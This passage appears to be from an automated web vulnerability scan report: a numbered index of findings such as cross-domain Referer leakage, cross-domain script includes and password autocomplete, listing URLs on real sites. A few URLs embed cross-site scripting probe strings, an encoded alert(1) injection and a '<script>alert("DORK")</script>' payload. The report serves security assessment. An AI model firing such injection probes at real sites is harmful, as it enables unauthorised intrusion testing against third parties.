7.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.6. http://event.adxpose.com/event.flow

7.7. http://support.dogpile.com/pressroom/

7.8. http://www.888.com/favicon.ico

7.9. http://www.adleaf.com/favicon.ico

7.10. http://www.cambridge.org/uk/date/writeYear_js.asp

7.11. http://www.dogpile.com/

7.12. http://www.dogpile.com/clickcallbackserver/_iceUrlFlag=1

7.13. http://www.dogpile.com/clickserver/_iceUrlFlag=1

7.14. http://www.dogpile.com/dogpile/ws/about/

7.15. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

7.16. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

7.17. http://www.dogpile.com/dogpile/ws/contactUs/rfcid=1293/rfcp=left/_iceUrlFlag=11

7.18. http://www.dogpile.com/dogpile/ws/faq/

7.19. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

7.20. http://www.dogpile.com/dogpile/ws/redir/_iceUrlFlag=11

7.21. http://www.dogpile.com/dogpile/ws/results/Web/april%20fools%20day%20pranks/1/42/Seasonal/Relevance/

7.22. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

7.23. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

7.24. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

7.25. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

7.26. http://www.dogpile.com/dogpile_other/ws/bookmark/bwr=ffchrm/_iceUrlFlag=11

7.27. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

7.28. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

7.29. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

7.30. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

7.31. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

7.32. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

7.33. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

7.34. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

7.35. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

7.36. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

7.37. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

7.38. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

7.39. http://www.dogpile.com/dogpile_other/ws/index

7.40. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

7.41. http://www.dogpile.com/dogpile_other/ws/index/qcat=Images/_iceUrlFlag=11

7.42. http://www.dogpile.com/dogpile_other/ws/index/qcat=News/_iceUrlFlag=11

7.43. http://www.dogpile.com/dogpile_other/ws/index/qcat=Video/_iceUrlFlag=11

7.44. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

7.45. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

7.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

7.47. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

7.48. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

7.49. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

7.50. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.51. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

7.52. http://www.dogpile.com/dogpile_other/ws/redir/_iceUrlFlag=11

7.53. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Dark%20Sites/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.54. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Review%20Sites/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.55. http://www.dogpile.com/dogpile_other/ws/redir/qcat=Web/qcoll=relevance/qkw=Submit%20Site/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.56. http://www.dogpile.com/dogpile_other/ws/redir/qkw=horoscope/rfcid=4400/rfcp=quickstart-6/qlnk=1/_iceUrlFlag=11

7.57. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

7.58. http://www.dogpile.com/dogpile_other/ws/termsofuse/_iceUrlFlag=11

7.59. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

7.60. http://www.dogpile.com/dogpile_prefer/ws/redir/_iceUrlFlag=11

7.61. http://www.dogpile.com/dogpile_rss/web/GE+Zero+Taxes

7.62. http://www.dogpile.com/dogpile_rss/web/Go+Daddy+CEO+Elephant

7.63. http://www.dogpile.com/dogpile_rss/web/MLB+Schedule

7.64. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

7.65. http://www.dogpile.com/dogpile_rss/ws/aboutresults/_iceUrlFlag=11

7.66. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

7.67. http://www.dogpile.com/dogpile_rss/ws/ie8upgradelearnmore/rfcid=978/rfcp=TopNavigation/_iceUrlFlag=11

7.68. http://www.dogpile.com/dogpile_rss/ws/index/

7.69. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

7.70. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

7.71. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

7.72. http://www.dogpile.com/dogpile_rss/ws/preferences/_iceUrlFlag=11

7.73. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

7.74. http://www.dogpile.com/dogpile_rss/ws/privacy/_iceUrlFlag=11

7.75. http://www.dogpile.com/dogpile_rss/ws/redir/_iceUrlFlag=11

7.76. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Bowl/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

7.77. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Com/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

7.78. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email%20Login/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.79. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Email/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

7.80. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Log%20In/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.81. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Video/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

7.82. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy%20Videos%20Full/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.83. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Go%20Daddy/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

7.84. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=MLB%20Schedule/adv=/rfcp=RightNav/rfcid=107/_iceUrlFlag=11

7.85. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%202010%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302363/_iceUrlFlag=11

7.86. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Baseball%20Schedules/qlnk=1/rfcp=RightNav/rfcid=302362/_iceUrlFlag=11

7.87. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%201!2F1!2F09%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302360/_iceUrlFlag=11

7.88. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Network%20Schedule/qlnk=1/rfcp=RightNav/rfcid=302364/_iceUrlFlag=11

7.89. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302358/_iceUrlFlag=11

7.90. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Scores/qlnk=1/rfcp=RightNav/rfcid=302359/_iceUrlFlag=11

7.91. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Standings/qlnk=1/rfcp=RightNav/rfcid=302361/_iceUrlFlag=11

7.92. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=Web/qcoll=relevance/qkw=Mlb%20Trade%20Rumors/qlnk=1/rfcp=RightNav/rfcid=302357/_iceUrlFlag=11

7.93. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=Go%20Daddy%20CEO%20Elephant/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

7.94. http://www.dogpile.com/dogpile_rss/ws/redir/qcat=web/qkw=MLB%20Schedule/newtxn=false/rfcid=393/rfcp=TopNavigation/_iceUrlFlag=11

7.95. http://www.dogpile.com/dogpile_rss/ws/termsofuse/_iceUrlFlag=11

7.96. http://www.gospel.com/favicon.ico

7.97. http://www.hughesnetpower.com/favicon.ico

7.98. http://www.mappoint.net/favicon.ico

7.99. http://www.mercantila-checkout.com/setcookie.js

7.100. http://www.mercantila.com/

7.101. http://www.myjobprospects.com/favicon.ico

7.102. http://a.collective-media.net/adj/ns.androidtapp/general

7.103. http://ad.amgdgt.com/ads/

7.104. http://ad.yieldmanager.com/pixel

7.105. http://ad.yieldmanager.com/unpixel

7.106. http://b.scorecardresearch.com/b

7.107. http://b.scorecardresearch.com/p

7.108. http://bh.contextweb.com/bh/set.aspx

7.109. http://cf.addthis.com/red/p.json

7.110. http://leadback.advertising.com/adcedge/lb

7.111. http://mm.chitika.net/minimall

7.112. http://pixel.33across.com/ps/

7.113. http://pixel.fetchback.com/serve/fb/pdc

7.114. http://pixel.quantserve.com/pixel

7.115. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.116. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.117. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.118. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.119. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.120. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.121. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.122. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.123. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

7.124. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

7.125. http://safebrowsing.clients.google.com/safebrowsing/downloads

7.126. http://syndication.mmismm.com/tntwo.php

7.127. http://tags.bluekai.com/site/2045

7.128. http://tags.bluekai.com/site/2731

7.129. http://view.c3metrics.com/c3VTabstrct-6-2.php

7.130. http://www.allgetaways.com/favicon.ico

7.131. http://www.amway.com/favicon.ico

7.132. http://www.androidtapp.com/wp-content/plugins/wp-spamfree/js/wpsf-js.php

7.133. http://www.androidtapp.com/wp-login.php

7.134. http://www.battleofthecheetos.com/favicon.ico

7.135. http://www.belkin.com/favicon.ico

7.136. http://www.betus.com/favicon.ico

7.137. http://www.billoreilly.com/favicon.ico

7.138. http://www.blacksingles.com/favicon.ico

7.139. http://www.bluefly.com/favicon.ico

7.140. http://www.boardgamegeek.com/favicon.ico

7.141. http://www.bradsdeals.com/favicon.ico

7.142. http://www.cancercenter.com/favicon.ico

7.143. http://www.capella.edu/favicon.ico

7.144. http://www.caring4cancer.com/favicon.ico

7.145. http://www.chasefreedomnow.com/favicon.ico

7.146. http://www.cheapostay.com/favicon.ico

7.147. http://www.clearcontests.com/favicon.ico

7.148. http://www.csi-tracking.com/favicon.ico

7.149. http://www.dailydealfetcher.com/

7.150. http://www.deviceanywhere.com/favicon.ico

7.151. http://www.dmvnow.com/exec/common/VitaHeader-Redesign.css

7.152. http://www.dmvnow.com/exec/common/dmvnow2.css

7.153. http://www.dmvnow.com/exec/common/dmvprint.css

7.154. http://www.dmvnow.com/exec/common/textsizer.js

7.155. http://www.dmvnow.com/favicon.ico

7.156. http://www.dmvnow.com/images/aboutus_off.gif

7.157. http://www.dmvnow.com/images/aboutus_on.gif

7.158. http://www.dmvnow.com/images/ads/11042.jpg

7.159. http://www.dmvnow.com/images/ads/11092.jpg

7.160. http://www.dmvnow.com/images/ads/11134.jpg

7.161. http://www.dmvnow.com/images/ads/11153.jpg

7.162. http://www.dmvnow.com/images/ads/11190.jpg

7.163. http://www.dmvnow.com/images/ads/11216.jpg

7.164. http://www.dmvnow.com/images/breadcrumbcenter.jpg

7.165. http://www.dmvnow.com/images/citserv_on.gif

7.166. http://www.dmvnow.com/images/common_feel_bg.jpg

7.167. http://www.dmvnow.com/images/commserv_on.gif

7.168. http://www.dmvnow.com/images/contactus_off.gif

7.169. http://www.dmvnow.com/images/contactus_on.gif

7.170. http://www.dmvnow.com/images/dmv2.jpg

7.171. http://www.dmvnow.com/images/dmv3.jpg

7.172. http://www.dmvnow.com/images/dmv4.jpg

7.173. http://www.dmvnow.com/images/dmv7b.jpg

7.174. http://www.dmvnow.com/images/dmv8b.jpg

7.175. http://www.dmvnow.com/images/dmvcontent11.jpg

7.176. http://www.dmvnow.com/images/dmvgeneral1.jpg

7.177. http://www.dmvnow.com/images/dmvhome9.jpg

7.178. http://www.dmvnow.com/images/dmvhome_on.gif

7.179. http://www.dmvnow.com/images/dmvnow.jpg

7.180. http://www.dmvnow.com/images/forms_on.gif

7.181. http://www.dmvnow.com/images/geninfo_on.gif

7.182. http://www.dmvnow.com/images/go_ball.gif

7.183. http://www.dmvnow.com/images/icon_email.gif

7.184. http://www.dmvnow.com/images/icon_printergif.gif

7.185. http://www.dmvnow.com/images/moving_on.gif

7.186. http://www.dmvnow.com/images/officelocations_off.gif

7.187. http://www.dmvnow.com/images/officelocations_on.gif

7.188. http://www.dmvnow.com/images/online_on.gif

7.189. http://www.dmvnow.com/images/peak2000.jpg

7.190. http://www.dmvnow.com/images/resources_on.gif

7.191. http://www.dmvnow.com/images/se.gif

7.192. http://www.dmvnow.com/images/sitemap_off.gif

7.193. http://www.dmvnow.com/images/sitemap_on.gif

7.194. http://www.dmvnow.com/images/sw.gif

7.195. http://www.dmvnow.com/images/tanline.jpg

7.196. http://www.dmvnow.com/images/virginia_dot_gov_logo.jpg

7.197. http://www.dmvnow.com/images/virginia_seach_button-bg.jpg

7.198. http://www.dmvnow.com/images/virginia_seach_txt-bg.jpg

7.199. http://www.dmvnow.com/images/wcag1A.gif

7.200. http://www.dmvnow.com/images/webfeed.png

7.201. http://www.dogtimemedia.com/favicon.ico

7.202. http://www.driversed.com/favicon.ico

7.203. http://www.focusonthefamily.com/favicon.ico

7.204. http://www.guthy-renker-store.com/favicon.ico

7.205. http://www.heavygames.com/favicon.ico

7.206. http://www.jobtarget.com/favicon.ico

7.207. http://www.jpcycles.com/favicon.ico

7.208. http://www.kraftbrands.com/favicon.ico

7.209. http://www.lookupanyone.com/favicon.ico

7.210. http://www.membershiprewards.com/favicon.ico

7.211. http://www.mychasecreditcards.com/favicon.ico

7.212. http://www.nielsen.com/favicon.ico

7.213. http://www.nwf.org/favicon.ico

7.214. http://www.owners.com/favicon.ico

7.215. http://www.peopletopeople.com/favicon.ico

7.216. http://www.personalizationmall.com/favicon.ico

7.217. http://www.progressiveagent.com/favicon.ico

7.218. http://www.rambler.ru/favicon.ico

7.219. http://www.rcuniverse.com/favicon.ico

7.220. http://www.richard-group.com/favicon.ico

7.221. http://www.savingssavy.info/favicon.ico

7.222. http://www.sba.gov/favicon.ico

7.223. http://www.superherohype.com/favicon.ico

7.224. http://www.thebreastcancersite.com/favicon.ico

7.225. http://www.venus.com/favicon.ico

7.226. http://www.volunteermatch.org/favicon.ico

7.227. http://www.wpbf.com/favicon.ico

7.228. http://www.wyndham.com/favicon.ico

7.229. http://www.zoomshare.com/favicon.ico

8. Password field with autocomplete enabled

8.1. http://ecards.myfuncards.com/myfuncards/404

8.2. http://www.androidtapp.com/wp-login.php

9. Referer-dependent response

10. Cross-domain POST

11. Cross-domain Referer leakage

11.1. http://ad.amgdgt.com/ads/

11.2. http://ad.doubleclick.net/adi/N3941.5122.NY1/B5147666.2

11.3. http://cim.meebo.com/cim/init.php

11.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

11.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.6. http://googleads.g.doubleclick.net/pagead/ads

11.7. http://googleads.g.doubleclick.net/pagead/ads

11.8. http://googleads.g.doubleclick.net/pagead/ads

11.9. http://googleads.g.doubleclick.net/pagead/ads

11.10. http://googleads.g.doubleclick.net/pagead/ads

11.11. http://ib.adnxs.com/ab

11.12. http://investor.infospaceinc.com/phoenix.zhtml

11.13. http://manhattan.ny1.com/Content/ServeContent.aspx

11.14. http://manhattan.ny1.com/Content/ServeContent.aspx

11.15. http://manhattan.ny1.com/Content/ServeContent.aspx

11.16. http://manhattan.ny1.com/Content/ServeContent.aspx

11.17. http://manhattan.ny1.com/Content/ServeContent.aspx

11.18. http://manhattan.ny1.com/Content/ServeContent.aspx

11.19. http://manhattan.ny1.com/Content/ServeContent.aspx

11.20. http://manhattan.ny1.com/Content/ServeContent.aspx

11.21. http://www.beatthetraffic.com/widgets/traveltimes.aspx

11.22. http://www.cambridge.org/uk/404_error.asp

11.23. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.24. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.25. http://www.dogpile.com/clickserver/_iceUrlFlag=1

11.26. http://www.dogpile.com/dogpile/ws/about/_iceUrlFlag=11

11.27. http://www.dogpile.com/dogpile/ws/contactUs/_iceUrlFlag=11

11.28. http://www.dogpile.com/dogpile/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

11.29. http://www.dogpile.com/dogpile_other/ws/about/_iceUrlFlag=11

11.30. http://www.dogpile.com/dogpile_other/ws/about/rfcid=1245/rfcp=left/_iceUrlFlag=11

11.31. http://www.dogpile.com/dogpile_other/ws/aboutArfie/rfcid=1385/rfcp=left/_iceUrlFlag=11

11.32. http://www.dogpile.com/dogpile_other/ws/aboutresults/rfcid=1386/rfcp=left/_iceUrlFlag=11

11.33. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Images/_iceUrlFlag=11

11.34. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=News/_iceUrlFlag=11

11.35. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Video/_iceUrlFlag=11

11.36. http://www.dogpile.com/dogpile_other/ws/bookmark/qcat=Web/_iceUrlFlag=11

11.37. http://www.dogpile.com/dogpile_other/ws/bookmark/rfcid=1211/_iceUrlFlag=11

11.38. http://www.dogpile.com/dogpile_other/ws/categories/_iceUrlFlag=11

11.39. http://www.dogpile.com/dogpile_other/ws/faq/_iceUrlFlag=11

11.40. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Images/_iceUrlFlag=11

11.41. http://www.dogpile.com/dogpile_other/ws/faq/qcat=News/_iceUrlFlag=11

11.42. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Video/_iceUrlFlag=11

11.43. http://www.dogpile.com/dogpile_other/ws/faq/qcat=Web/_iceUrlFlag=11

11.44. http://www.dogpile.com/dogpile_other/ws/faq/rfcid=416/rfcp=left/_iceUrlFlag=11

11.45. http://www.dogpile.com/dogpile_other/ws/index/_iceUrlFlag=11

11.46. http://www.dogpile.com/dogpile_other/ws/index/qcat=Web/_iceUrlFlag=11

11.47. http://www.dogpile.com/dogpile_other/ws/index/qcat=wp/_iceUrlFlag=11

11.48. http://www.dogpile.com/dogpile_other/ws/index/qcat=yp/_iceUrlFlag=11

11.49. http://www.dogpile.com/dogpile_other/ws/metasearch/rfcid=1384/rfcp=left/_iceUrlFlag=11

11.50. http://www.dogpile.com/dogpile_other/ws/offsite-forms/rfcid=1219/rfcp=quickstart-3/_iceUrlFlag=11

11.51. http://www.dogpile.com/dogpile_other/ws/preferences/_iceUrlFlag=11

11.52. http://www.dogpile.com/dogpile_other/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.53. http://www.dogpile.com/dogpile_other/ws/privacy/_iceUrlFlag=11

11.54. http://www.dogpile.com/dogpile_other/ws/results/Web/Submit%20Site/1/302362/RightNav/Relevance/iq=true/zoom=off/qlnk=1/_iceUrlFlag=7

11.55. http://www.dogpile.com/dogpile_other/ws/tips/_iceUrlFlag=11

11.56. http://www.dogpile.com/dogpile_rss/ws/about/_iceUrlFlag=11

11.57. http://www.dogpile.com/dogpile_rss/ws/faq/_iceUrlFlag=11

11.58. http://www.dogpile.com/dogpile_rss/ws/index/

11.59. http://www.dogpile.com/dogpile_rss/ws/index/_iceUrlFlag=11

11.60. http://www.dogpile.com/dogpile_rss/ws/index/qcat=wp/_iceUrlFlag=11

11.61. http://www.dogpile.com/dogpile_rss/ws/index/qcat=yp/_iceUrlFlag=11

11.62. http://www.dogpile.com/dogpile_rss/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

11.63. http://www.ny1.com/Content/ServeContent.aspx

11.64. http://www.ny1.com/Content/ServeContent.aspx

11.65. http://www.ny1.com/Content/ServeContent.aspx

11.66. http://www.ny1.com/Content/ServeContent.aspx

11.67. http://www.ny1.com/Content/ServeContent.aspx

11.68. http://www.ny1.com/Content/ServeContent.aspx

11.69. http://www.ny1.com/Content/ServeContent.aspx

11.70. http://www.ny1.com/Content/ServeContent.aspx

11.71. http://www.ny1.com/favicon.ico

11.72. http://www.quickyellow.com/includes/all.topcategories.cfm

12. Cross-domain script include

12.1. http://ad.amgdgt.com/ads/

12.2. http://cim.meebo.com/cim/init.php

12.3. http://dogpile.com/

12.4. http://dogpile.com/dogpile/ws/index/qcat=yp/_iceUrlFlag=11

12.5. http://dogpile.com/dogpile/ws/preferences/rfcid=415/rfcp=TopNavigation/_iceUrlFlag=11

12.6. http://ecards.myfuncards.com/myfuncards/404

12.7. http://googleads.g.doubleclick.net/pagead/ads

12.8. http://googleads.g.doubleclick.net/pagead/ads

12.9. http://investor.infospaceinc.com/phoenix.zhtml

12.10. http://manhattan.ny1.com/App_Skins/News1/Scripts/functions.js

12.11. http://manhattan.ny1.com/Content/ServeContent.aspx

12.12. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.13. http://r1-ads.ace.advertising.com/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.14. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.15. http://r1-ads.ace.advertising.com/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.16. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.17. http://r1-ads.ace.advertising.com/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.18. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=47025873/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.19. http://r1-ads.ace.advertising.com/site=782463/size=160600/u=2/bnum=70936362/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=5/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.20. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=21125090/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

12.21. http://r1-ads.ace.advertising.com/site=782464/size=300250/u=2/bnum=83041319/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

12.22. http://s.aeriagames.com/misc/ads/error_banner_en.html

12.23. http://www.2theadvocate.com/favicon.ico

12.24. http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49

12.25. http://www.beatthetraffic.com/widgets/traveltimes.aspx

12.26. http://www.cambridge.org/uk/catalogue/viewBasket.asp

12.27. http://www.carolwrightgifts.com/favicon.ico

12.28. http://www.clairol.com/favicon.ico

12.29. http://www.courtcareers.com/favicon.ico

12.30. http://www.covergirl.com/favicon.ico

12.31. http://www.crosswalk.com/favicon.ico

